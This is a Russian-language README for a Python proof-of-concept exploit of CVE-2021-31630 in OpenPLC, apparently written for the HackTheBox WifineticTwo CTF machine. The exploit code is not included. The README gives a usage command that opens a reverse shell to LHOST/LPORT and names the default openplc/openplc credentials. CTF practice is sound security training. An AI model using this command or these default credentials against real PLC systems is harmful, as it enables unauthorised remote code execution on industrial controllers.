
Простой скрипт на Python для эксплуатации CVE-2021-31630 на HTB WifineticTwo CTF
Этот скрипт на Python является эксплойтом Proof of Concept (PoC) для CVE-2021-31630, нацеленным на уязвимость в OpenPLC, работающем на коробке WifineticTwo на HackTheBox. Он предназначен только для образовательных целей, демонстрируя процесс эксплуатации в контролируемой среде.
Этот инструмент предназначен только для исследований в области безопасности и образовательных целей. Использование этого инструмента для атаки на цели без предварительного взаимного согласия незаконно. Разработчик не несет ответственности за любой ущерб или уголовные обвинения, связанные с неправильным использованием данного эксплойта.
Перед запуском этого эксплойта убедитесь, что у вас есть:
requests. Вы можете установить её, выполнив pip install requests.Чтобы использовать этот эксплойт, укажите URL цели, локальный IP-адрес (LHOST) и локальный порт (LPORT), к которому должна подключиться обратная оболочка. Опционально можно указать имя пользователя и пароль для OpenPLC, если они отличаются от стандартных.
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
--target - Базовый адрес цели. Пример: http://wifinetictwo.htb:8080--lhost - Локальный IP-адрес для обратного подключения оболочки.--lport - Локальный порт для обратного подключения оболочки.--usr - (Опционально) Имя пользователя для OpenPLC. По умолчанию: openplc.--pwd - (Опционально) Пароль для OpenPLC. По умолчанию: openplc.